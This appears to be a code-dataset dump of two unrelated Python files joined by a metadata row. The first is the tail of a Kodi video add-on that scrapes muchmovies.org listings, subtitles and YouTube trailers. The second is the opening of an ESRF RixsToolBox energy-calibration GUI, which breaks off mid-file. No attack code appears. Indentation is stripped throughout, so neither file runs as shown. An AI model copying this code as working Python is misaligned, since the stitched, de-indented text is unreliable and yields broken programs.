for q in quality:
subtitles += re.compile(match % q).findall(result)
if subtitles == []: raise Exception()
for subtitle in subtitles:
url = 'http://www.findsubtitles.eu/getp.php?id=' + subtitle
response = urllib.urlopen(url)
content = response.read()
response.close()
if content[:4] == 'PK': break
file = open(sub_file, 'wb')
file.write(content)
file.close()
file = zipfile.ZipFile(sub_file, 'r')
file.extractall(sub_tmp)
file.close()
files = os.listdir(sub_tmp2)
if files == []: raise Exception()
file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')]
if file == []:
pack = [i for i in files if i.endswith('.zip') or i.endswith('.rar')]
pack = os.path.join(sub_tmp2, pack[0])
xbmc.executebuiltin('Extract("%s","%s")' % (pack, sub_tmp2))
time.sleep(1)
files = os.listdir(sub_tmp2)
file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')][0]
copy = os.path.join(sub_tmp2, file)
shutil.copy(copy, sub_stream)
try: shutil.rmtree(sub_tmp)
except: pass
file = os.path.join(sub_stream, file)
if not os.path.isfile(file): raise Exception()
xbmc.Player().setSubtitles(file)
except:
try: shutil.rmtree(sub_tmp)
except: pass
try: shutil.rmtree(sub_stream)
except: pass
index().infoDialog(language(30317).encode("utf-8"), name)
return
class index:
def infoDialog(self, str, header=addonName):
try: xbmcgui.Dialog().notification(header, str, addonIcon, 3000, sound=False)
except: xbmc.executebuiltin("Notification(%s,%s, 3000, %s)" % (header, str, addonIcon))
def okDialog(self, str1, str2, header=addonName):
xbmcgui.Dialog().ok(header, str1, str2)
def selectDialog(self, list, header=addonName):
select = xbmcgui.Dialog().select(header, list)
return select
def yesnoDialog(self, str1, str2, header=addonName):
answer = xbmcgui.Dialog().yesno(header, str1, str2)
return answer
def getProperty(self, str):
property = xbmcgui.Window(10000).getProperty(str)
return property
def setProperty(self, str1, str2):
xbmcgui.Window(10000).setProperty(str1, str2)
def clearProperty(self, str):
xbmcgui.Window(10000).clearProperty(str)
def addon_status(self, id):
check = xbmcaddon.Addon(id=id).getAddonInfo("name")
if not check == addonName: return True
def container_refresh(self):
xbmc.executebuiltin("Container.Refresh")
def container_data(self):
if not xbmcvfs.exists(dataPath):
xbmcvfs.mkdir(dataPath)
if not xbmcvfs.exists(favData):
file = xbmcvfs.File(favData, 'w')
file.write('')
file.close()
if not xbmcvfs.exists(viewData):
file = xbmcvfs.File(viewData, 'w')
file.write('')
file.close()
def container_view(self, content, viewDict):
try:
skin = xbmc.getSkinDir()
file = xbmcvfs.File(viewData)
read = file.read().replace('\n','')
file.close()
view = re.compile('"%s"[|]"%s"[|]"(.+?)"' % (skin, content)).findall(read)[0]
xbmc.executebuiltin('Container.SetViewMode(%s)' % str(view))
except:
try:
id = str(viewDict[skin])
xbmc.executebuiltin('Container.SetViewMode(%s)' % id)
except:
pass
def rootList(self, rootList):
total = len(rootList)
for i in rootList:
try:
name = language(i['name']).encode("utf-8")
image = '%s/%s' % (addonArt, i['image'])
action = i['action']
u = '%s?action=%s' % (sys.argv[0], action)
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True)
except:
pass
def pageList(self, pageList):
if pageList == None: return
total = len(pageList)
for i in pageList:
try:
name, url, image = i['name'], i['url'], i['image']
sysname, sysurl, sysimage = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image)
u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl)
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True)
except:
pass
def nextList(self, nextList):
try: next = nextList[0]['next']
except: return
if next == '': return
name, url, image = language(30361).encode("utf-8"), next, addonNext
sysurl = urllib.quote_plus(url)
u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl)
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True)
def downloadList(self):
u = getSetting("downloads")
if u == '': return
name, image = language(30363).encode("utf-8"), addonDownloads
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True)
def movieList(self, movieList):
if movieList == None: return
file = xbmcvfs.File(favData)
favRead = file.read()
file.close()
total = len(movieList)
for i in movieList:
try:
name, url, image, title, year, imdb, genre, plot = i['name'], i['url'], i['image'], i['title'], i['year'], i['imdb'], i['genre'], i['plot']
if plot == '': plot = addonDesc
if genre == '': genre = ' '
sysname, sysurl, sysimage, systitle, sysimdb = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image), urllib.quote_plus(title), urllib.quote_plus(imdb)
u = '%s?action=play&name=%s&url=%s&t=%s' % (sys.argv[0], sysname, sysurl, datetime.datetime.now().strftime("%Y%m%d%H%M%S%f"))
if getSetting("meta") == 'true':
meta = metaget.get_meta('movie', title ,year=year)
playcountMenu = language(30407).encode("utf-8")
if meta['overlay'] == 6: playcountMenu = language(30408).encode("utf-8")
metaimdb = urllib.quote_plus(re.sub("[^0-9]", "", meta['imdb_id']))
trailer, poster = urllib.quote_plus(meta['trailer_url']), meta['cover_url']
if trailer == '': trailer = sysurl
if poster == '': poster = image
else:
meta = {'label': title, 'title': title, 'year': year, 'imdb_id' : imdb, 'genre' : genre, 'plot': plot}
trailer, poster = sysurl, image
if getSetting("meta") == 'true' and getSetting("fanart") == 'true':
fanart = meta['backdrop_url']
if fanart == '': fanart = addonFanart
else:
fanart = addonFanart
cm = []
cm.append((language(30405).encode("utf-8"), 'RunPlugin(%s?action=item_queue)' % (sys.argv[0])))
cm.append((language(30406).encode("utf-8"), 'RunPlugin(%s?action=download&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30412).encode("utf-8"), 'Action(Info)'))
if action == 'movies_favourites':
if not getSetting("fav_sort") == '2': cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb)))
if getSetting("meta") == 'true': cm.append((playcountMenu, 'RunPlugin(%s?action=playcount_movies&imdb=%s)' % (sys.argv[0], metaimdb)))
cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
if getSetting("fav_sort") == '2': cm.append((language(30419).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveUp&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if getSetting("fav_sort") == '2': cm.append((language(30420).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveDown&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30421).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
elif action == 'movies_search':
cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_from_search&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage)))
cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
cm.append((language(30409).encode("utf-8"), 'RunPlugin(%s?action=settings_open)' % (sys.argv[0])))
cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0])))
cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0])))
else:
cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies2&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb)))
cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if not '"%s"' % url in favRead: cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_add&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage)))
else: cm.append((language(30418).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0])))
cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0])))
item = xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=poster)
item.setInfo( type="Video", infoLabels = meta )
item.setProperty("IsPlayable", "true")
item.setProperty("Video", "true")
item.setProperty("art(poster)", poster)
item.setProperty("Fanart_Image", fanart)
item.addContextMenuItems(cm, replaceItems=True)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=False)
except:
pass
class contextMenu:
def item_play(self):
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin('Action(Queue)')
playlist.unshuffle()
xbmc.Player().play(playlist)
def item_random_play(self):
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin('Action(Queue)')
playlist.shuffle()
xbmc.Player().play(playlist)
def item_queue(self):
xbmc.executebuiltin('Action(Queue)')
def playlist_open(self):
xbmc.executebuiltin('ActivateWindow(VideoPlaylist)')
def settings_open(self):
xbmc.executebuiltin('Addon.OpenSettings(%s)' % (addonId))
def addon_home(self):
xbmc.executebuiltin('Container.Update(plugin://%s/,replace)' % (addonId))
def view(self, content):
try:
skin = xbmc.getSkinDir()
if xbmcvfs.exists(xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))):
xml = xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))
elif xbmcvfs.exists(xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))):
xml = xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))
else:
return
file = xbmcvfs.File(xml)
read = file.read().replace('\n','')
file.close()
src = os.path.dirname(xml) + '/'
try:
src += re.compile('defaultresolution="(.+?)"').findall(read)[0] + '/'
except:
src += re.compile('<res.+?folder="(.+?)"').findall(read)[0] + '/'
src += 'MyVideoNav.xml'
file = xbmcvfs.File(src)
read = file.read().replace('\n','')
file.close()
views = re.compile('<views>(.+?)</views>').findall(read)[0]
views = [int(x) for x in views.split(',')]
for view in views:
label = xbmc.getInfoLabel('Control.GetLabel(%s)' % (view))
if not (label == '' or label is None): break
file = xbmcvfs.File(viewData)
read = file.read()
file.close()
file = open(viewData, 'w')
for line in re.compile('(".+?\n)').findall(read):
if not line.startswith('"%s"|"%s"|"' % (skin, content)): file.write(line)
file.write('"%s"|"%s"|"%s"\n' % (skin, content, str(view)))
file.close()
viewName = xbmc.getInfoLabel('Container.Viewmode')
index().infoDialog('%s%s%s' % (language(30301).encode("utf-8"), viewName, language(30302).encode("utf-8")))
except:
return
def favourite_add(self, data, name, url, image, imdb):
try:
index().container_refresh()
file = open(data, 'a+')
file.write('"%s"|"%s"|"%s"\n' % (name, url, image))
file.close()
index().infoDialog(language(30303).encode("utf-8"), name)
except:
return
def favourite_from_search(self, data, name, url, image, imdb):
try:
file = xbmcvfs.File(data)
read = file.read()
file.close()
if url in read:
index().infoDialog(language(30307).encode("utf-8"), name)
return
file = open(data, 'a+')
file.write('"%s"|"%s"|"%s"\n' % (name, url, image))
file.close()
index().infoDialog(language(30303).encode("utf-8"), name)
except:
return
def favourite_delete(self, data, name, url):
try:
index().container_refresh()
file = xbmcvfs.File(data)
read = file.read()
file.close()
line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
list = re.compile('(".+?\n)').findall(read.replace(line, ''))
file = open(data, 'w')
for line in list: file.write(line)
file.close()
index().infoDialog(language(30304).encode("utf-8"), name)
except:
return
def favourite_moveUp(self, data, name, url):
try:
index().container_refresh()
file = xbmcvfs.File(data)
read = file.read()
file.close()
list = re.compile('(".+?)\n').findall(read)
line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
i = list.index(line)
if i == 0 : return
list[i], list[i-1] = list[i-1], list[i]
file = open(data, 'w')
for line in list: file.write('%s\n' % (line))
file.close()
index().infoDialog(language(30305).encode("utf-8"), name)
except:
return
def favourite_moveDown(self, data, name, url):
try:
index().container_refresh()
file = xbmcvfs.File(data)
read = file.read()
file.close()
list = re.compile('(".+?)\n').findall(read)
line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
i = list.index(line)
if i+1 == len(list): return
list[i], list[i+1] = list[i+1], list[i]
file = open(data, 'w')
for line in list: file.write('%s\n' % (line))
file.close()
index().infoDialog(language(30306).encode("utf-8"), name)
except:
return
def metadata(self, content, name, url, imdb, season, episode):
try:
if content == 'movie' or content == 'tvshow':
metaget.update_meta(content, '', imdb, year='')
index().container_refresh()
elif content == 'season':
metaget.update_episode_meta('', imdb, season, episode)
index().container_refresh()
elif content == 'episode':
metaget.update_season('', imdb, season)
index().container_refresh()
except:
return
def playcount(self, content, imdb, season, episode):
try:
metaget.change_watched(content, '', imdb, season=season, episode=episode, year='', watched='')
index().container_refresh()
except:
return
def library(self, name, url, silent=False):
try:
library = xbmc.translatePath(getSetting("movie_library"))
sysname, sysurl = urllib.quote_plus(name), urllib.quote_plus(url)
content = '%s?action=play&name=%s&url=%s' % (sys.argv[0], sysname, sysurl)
enc_name = name.translate(None, '\/:*?"<>|')
folder = os.path.join(library, enc_name)
stream = os.path.join(folder, enc_name + '.strm')
xbmcvfs.mkdir(dataPath)
xbmcvfs.mkdir(library)
xbmcvfs.mkdir(folder)
file = xbmcvfs.File(stream, 'w')
file.write(content)
file.close()
if silent == False:
index().infoDialog(language(30311).encode("utf-8"), name)
except:
return
def download(self, name, url):
try:
property = (addonName+name)+'download'
download = xbmc.translatePath(getSetting("downloads"))
enc_name = name.translate(None, '\/:*?"<>|')
xbmcvfs.mkdir(dataPath)
xbmcvfs.mkdir(download)
file = [i for i in xbmcvfs.listdir(download)[1] if i.startswith(enc_name + '.')]
if not file == []: file = os.path.join(download, file[0])
else: file = None
if download == '':
yes = index().yesnoDialog(language(30341).encode("utf-8"), language(30342).encode("utf-8"))
if yes: contextMenu().settings_open()
return
if file is None:
pass
elif not file.endswith('.tmp'):
yes = index().yesnoDialog(language(30343).encode("utf-8"), language(30344).encode("utf-8"), name)
if yes:
xbmcvfs.delete(file)
else:
return
elif file.endswith('.tmp'):
if index().getProperty(property) == 'open':
yes = index().yesnoDialog(language(30345).encode("utf-8"), language(30346).encode("utf-8"), name)
if yes: index().setProperty(property, 'cancel')
return
else:
xbmcvfs.delete(file)
url = resolver().run(url, name, download=True)
if url is None: return
ext = url.rsplit('/', 1)[-1].rsplit('?', 1)[0].rsplit('|', 1)[0].strip().lower()
ext = os.path.splitext(ext)[1][1:]
stream = os.path.join(download, enc_name + '.' + ext)
temp = stream + '.tmp'
count = 0
CHUNK = 16 * 1024
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
request.add_header('Cookie', 'video=true') #add cookie
response = urllib2.urlopen(request, timeout=10)
size = response.info()["Content-Length"]
file = xbmcvfs.File(temp, 'w')
index().setProperty(property, 'open')
index().infoDialog(language(30308).encode("utf-8"), name)
while True:
chunk = response.read(CHUNK)
if not chunk: break
if index().getProperty(property) == 'cancel': raise Exception()
if xbmc.abortRequested == True: raise Exception()
part = xbmcvfs.File(temp)
quota = int(100 * float(part.size())/float(size))
part.close()
if not count == quota and count in [0,10,20,30,40,50,60,70,80,90]:
index().infoDialog(language(30309).encode("utf-8") + str(count) + '%', name)
file.write(chunk)
count = quota
response.close()
file.close()
index().clearProperty(property)
xbmcvfs.rename(temp, stream)
index().infoDialog(language(30310).encode("utf-8"), name)
except:
file.close()
index().clearProperty(property)
xbmcvfs.delete(temp)
sys.exit()
return
def trailer(self, name, url):
url = resolver().trailer(name, url)
if url is None: return
item = xbmcgui.ListItem(path=url)
item.setProperty("IsPlayable", "true")
xbmc.Player(xbmc.PLAYER_CORE_AUTO).play(url, item)
class favourites:
def __init__(self):
self.list = []
def movies(self):
file = xbmcvfs.File(favData)
read = file.read()
file.close()
match = re.compile('"(.+?)"[|]"(.+?)"[|]"(.+?)"').findall(read)
for name, url, image in match:
try: year = re.compile('[(](\d{4})[)]').findall(name)[-1]
except: year = '0'
title = name.replace('(%s)' % year, '').strip()
self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': ''})
if getSetting("fav_sort") == '0':
self.list = sorted(self.list, key=itemgetter('title'))
elif getSetting("fav_sort") == '1':
self.list = sorted(self.list, key=itemgetter('title'))[::-1]
self.list = sorted(self.list, key=itemgetter('year'))[::-1]
index().movieList(self.list)
class root:
def get(self):
rootList = []
rootList.append({'name': 30501, 'image': 'Title.png', 'action': 'movies_title'})
rootList.append({'name': 30502, 'image': 'Release.png', 'action': 'movies_release'})
rootList.append({'name': 30503, 'image': 'Added.png', 'action': 'movies_added'})
rootList.append({'name': 30504, 'image': 'Rating.png', 'action': 'movies_rating'})
rootList.append({'name': 30505, 'image': 'Pages.png', 'action': 'pages_movies'})
rootList.append({'name': 30506, 'image': 'Genres.png', 'action': 'genres_movies'})
rootList.append({'name': 30507, 'image': 'Favourites.png', 'action': 'movies_favourites'})
rootList.append({'name': 30508, 'image': 'Search.png', 'action': 'movies_search'})
index().rootList(rootList)
index().downloadList()
class link:
def __init__(self):
self.muchmovies_base = 'http://www.muchmovies.org'
self.muchmovies_sort = 'http://www.muchmovies.org/session/sort'
self.muchmovies_title = 'http://www.muchmovies.org/movies?sort_by=title'
self.muchmovies_release = 'http://www.muchmovies.org/movies?sort_by=release'
self.muchmovies_added = 'http://www.muchmovies.org/movies?sort_by=date_added'
self.muchmovies_rating = 'http://www.muchmovies.org/movies?sort_by=rating'
self.muchmovies_root = 'http://www.muchmovies.org/movies'
self.muchmovies_search = 'http://www.muchmovies.org/search'
self.muchmovies_genre = 'http://www.muchmovies.org/genres'
self.youtube_base = 'http://www.youtube.com'
self.youtube_search = 'http://gdata.youtube.com/feeds/api/videos?q='
self.youtube_watch = 'http://www.youtube.com/watch?v=%s'
self.youtube_info = 'http://gdata.youtube.com/feeds/api/videos/%s?v=2'
class pages:
def __init__(self):
self.list = []
def muchmovies(self):
self.list = self.muchmovies_list()
index().pageList(self.list)
def muchmovies_list(self):
try:
result = getUrl(link().muchmovies_root, mobile=True).result
pages = common.parseDOM(result, "div", attrs = { "class": "pagenav" })[0]
pages = re.compile('(<option.+?</option>)').findall(pages)
except:
return
for page in pages:
try:
name = common.parseDOM(page, "option")[0]
name = common.replaceHTMLCodes(name)
name = name.encode('utf-8')
url = common.parseDOM(page, "option", ret="value")[0]
url = '%s%s?sort_by=title' % (link().muchmovies_base, url)
url = common.replaceHTMLCodes(url)
url = url.encode('utf-8')
image = addonPages.encode('utf-8')
self.list.append({'name': name, 'url': url, 'image': image})
except:
pass
return self.list
class genres:
def __init__(self):
self.list = []
def muchmovies(self):
self.list = self.muchmovies_list()
index().pageList(self.list)
def muchmovies_list(self):
try:
result = getUrl(link().muchmovies_genre, mobile=True).result
genres = common.parseDOM(result, "ul", attrs = { "id": "genres" })
genres = common.parseDOM(genres, "li")
except:
return
for genre in genres:
try:
name = common.parseDOM(genre, "h2")[0]
name = common.replaceHTMLCodes(name)
name = name.encode('utf-8')
url = common.parseDOM(genre, "a", ret="href")[0]
url = '%s%s?sort_by=release' % (link().muchmovies_base, url)
url = common.replaceHTMLCodes(url)
url = url.encode('utf-8')
image = common.parseDOM(genre, "img", ret="src")[0]
image = '%s%s' % (link().muchmovies_base, image)
image = common.replaceHTMLCodes(image)
image = image.encode('utf-8')
self.list.append({'name': name, 'url': url, 'image': image})
except:
pass
return self.list
class movies:
def __init__(self):
self.list = []
self.data = []
def muchmovies(self, url):
self.list = self.muchmovies_list(url)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_title(self):
self.list = self.muchmovies_list(link().muchmovies_title)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_release(self):
self.list = self.muchmovies_list(link().muchmovies_release)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_added(self):
self.list = self.muchmovies_list(link().muchmovies_added)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_rating(self):
self.list = self.muchmovies_list(link().muchmovies_rating)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_search(self, query=None):
if query is None:
self.query = common.getUserInput(language(30362).encode("utf-8"), '')
else:
self.query = query
if not (self.query is None or self.query == ''):
self.query = link().muchmovies_search + '/' + urllib.quote_plus(self.query.replace(' ', '-'))
self.list = self.muchmovies_list(self.query)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_list(self, url):
try:
post = url.split('?')[-1]
result = getUrl(link().muchmovies_sort, post=post, mobile=True, close=False, cookie=True).result
result = getUrl(url, mobile=True).result
movies = common.parseDOM(result, "li", attrs = { "data-icon": "false" })
except:
return
try:
try:
next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r", "class": "ui-disabled" })[0]
next = ''
except:
next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r" })[0]
next = '%s%s?%s' % (link().muchmovies_base, next, post)
except:
next = ''
for movie in movies:
try:
name = common.parseDOM(movie, "h2")[0]
name = common.replaceHTMLCodes(name)
name = name.encode('utf-8')
match = re.findall('(.+?)[(](\d{4})[)]', name)[0]
title = match[0].strip()
title = common.replaceHTMLCodes(title)
title = title.encode('utf-8')
year = match[-1].strip()
year = re.sub("[^0-9]", "", year)
year = year.encode('utf-8')
url = common.parseDOM(movie, "a", ret="href")[0]
url = '%s%s' % (link().muchmovies_base, url)
url = common.replaceHTMLCodes(url)
url = url.encode('utf-8')
image = common.parseDOM(movie, "img", ret="src")[0]
image = common.replaceHTMLCodes(image)
image = image.encode('utf-8')
self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': '', 'next': next})
except:
pass
return self.list
class resolver:
def run(self, url, name=None, download=False):
try:
if player().status() is True: return
url = self.muchmovies(url)
if url is None: raise Exception()
if download == True: return url
player().run(name, url)
return url
except:
index().infoDialog(language(30318).encode("utf-8"))
return
def muchmovies(self, url):
try:
result = getUrl(url, mobile=True).result
url = common.parseDOM(result, "a", ret="href")
url = [i for i in url if "?action=stream" in i][0]
url = url.split("?")[0]
return url
except:
return
def trailer(self, name, url):
try:
if not url.startswith('http://'):
url = link().youtube_watch % url
url = self.youtube(url)
else:
try:
result = getUrl(url).result
url = re.compile('"http://www.youtube.com/embed/(.+?)"').findall(result)[0]
if ' ' in url: raise Exception()
url = url.split("?")[0].split("&")[0]
url = link().youtube_watch % url
url = self.youtube(url)
except:
url = link().youtube_search + name + ' trailer'
url = self.youtube_search(url)
if url is None: return
return url
except:
return
def youtube_search(self, url):
try:
if index().addon_status('plugin.video.youtube') is None:
index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8"))
return
query = url.split("?q=")[-1].split("/")[-1].split("?")[0]
url = url.replace(query, urllib.quote_plus(query))
result = getUrl(url).result
result = common.parseDOM(result, "entry")
result = common.parseDOM(result, "id")
for url in result[:5]:
url = url.split("/")[-1]
url = link().youtube_watch % url
url = self.youtube(url)
if not url is None: return url
except:
return
def youtube(self, url):
try:
if index().addon_status('plugin.video.youtube') is None:
index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8"))
return
id = url.split("?v=")[-1].split("/")[-1].split("?")[0].split("&")[0]
state, reason = None, None
result = getUrl(link().youtube_info % id).result
try:
state = common.parseDOM(result, "yt:state", ret="name")[0]
reason = common.parseDOM(result, "yt:state", ret="reasonCode")[0]
except:
pass
if state == 'deleted' or state == 'rejected' or state == 'failed' or reason == 'requesterRegion' : return
try:
result = getUrl(link().youtube_watch % id).result
alert = common.parseDOM(result, "div", attrs = { "id": "watch7-notification-area" })[0]
return
except:
pass
url = 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % id
return url
except:
return
main() | gpl-2.0 | -4,796,895,218,968,150,000 | 45.186472 | 868 | 0.534018 | false |
kkummer/RixsToolBox | RTB_EnergyCalibration.py | 1 | 21352 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#/*##########################################################################
# Copyright (C) 2016 K. Kummer, A. Tamborino, European Synchrotron Radiation
# Facility
#
# This file is part of the ID32 RIXSToolBox developed at the ESRF by the ID32
# staff and the ESRF Software group.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#############################################################################*/
from __future__ import division
__author__ = "K. Kummer - ESRF ID32"
__contact__ = "[email protected]"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
___doc__ = """
...
"""
import os
import copy
import time
import numpy as np
from PyMca5.PyMcaGui import PyMcaQt as qt
from PyMca5.PyMcaGui.pymca import ScanWindow
from PyMca5.PyMcaCore.SpecFileDataSource import SpecFileDataSource
from PyMca5.PyMcaGui.pymca import QDispatcher
from PyMca5.PyMcaGui.pymca.SumRulesTool import MarkerSpinBox
from RTB_SpecGen import ExportWidget
from RTB_Icons import RtbIcons
class MainWindow(qt.QWidget):
def __init__(self, parent=None):
DEBUG = 1
qt.QWidget.__init__(self, parent)
self.setWindowTitle('RixsToolBox - Energy conversion')
self.setWindowIcon(qt.QIcon(qt.QPixmap(RtbIcons['Logo'])))
self.build()
self.connect_signals()
self.scansCalibrated = False
def build(self):
self._sourceWidget = QDispatcher.QDispatcher(self)
fileTypeList = ['Spec Files (*.spec)',
'Dat Files (*.dat)',
'All Files (*.*)']
self._sourceWidget.sourceSelector.fileTypeList = fileTypeList
for tabnum in range(self._sourceWidget.tabWidget.count()):
if self._sourceWidget.tabWidget.tabText(tabnum) != 'SpecFile':
self._sourceWidget.tabWidget.removeTab(tabnum)
self._sourceWidget.selectorWidget['SpecFile']
self._exportWidget = ExportWidget()
self._plotSpectraWindow = ScanWindow.ScanWindow(
parent=self,
backend=None,
plugins=False, # Hide plugin tool button
roi=False, # No ROI widget
control=True, # Hide option button
position=True, # Show x,y position display
info=True,
)
#~ self._plotSpectraWindow.graph.enablemarkermode()
calibrationWidget = qt.QGroupBox()
calibrationWidget.setTitle('Parameters')
calibrationLayout = qt.QHBoxLayout()
self._ecalibSpinBox = qt.QDoubleSpinBox()
self._ecalibSpinBox.setMaximumWidth(100)
self._ecalibSpinBox.setMinimumWidth(70)
self._ecalibSpinBox.setAlignment(qt.Qt.AlignRight)
self._ecalibSpinBox.setMinimum(-1000000)
self._ecalibSpinBox.setMaximum(1000000)
self._ecalibSpinBox.setDecimals(2)
self._ecalibSpinBox.setSingleStep(1)
self._ecalibSpinBox.setValue(50)
ecalibLayout = qt.QHBoxLayout()
ecalibLayout.addWidget(qt.QLabel('meV / px'))
ecalibLayout.addWidget(qt.HorizontalSpacer())
ecalibLayout.addWidget(self._ecalibSpinBox)
ecalibWidget = qt.QWidget()
ecalibWidget.setLayout(ecalibLayout)
